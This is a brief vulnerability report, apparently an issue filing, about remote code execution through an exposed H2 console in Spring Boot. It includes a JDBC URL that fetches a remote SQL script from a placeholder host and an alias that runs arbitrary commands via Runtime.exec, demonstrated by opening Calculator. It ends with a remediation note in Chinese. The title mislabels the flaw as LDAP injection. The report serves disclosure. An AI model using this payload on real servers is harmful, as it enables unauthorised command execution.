Unsafe component h2 is referenced, causing ldap injection

[m4ra7h0n]

url: http://host:ip/h2-console driver Class: org.h2.Driver JDBC URL: jdbc:h2:mem:dbtest;MODE=MSSQLServer;INIT=RUNSCRIPT FROM 'http://xxx/files/h2.sql' and the h2.sql below

CREATE ALIAS shel1 As $$void shel1(String s) throws Exception {
  java.lang.Runtime.getRuntime().exec(s);
}$$;
SELECT shel1('open -a Calculator.app');

vulnable environment spring Boot + H2 spring.h2.console.enabled=true JDK < 6u201、7u191、8u182、11.0.1（LDAP）

修复建议：禁用h2-console enable，或者升级jdk版本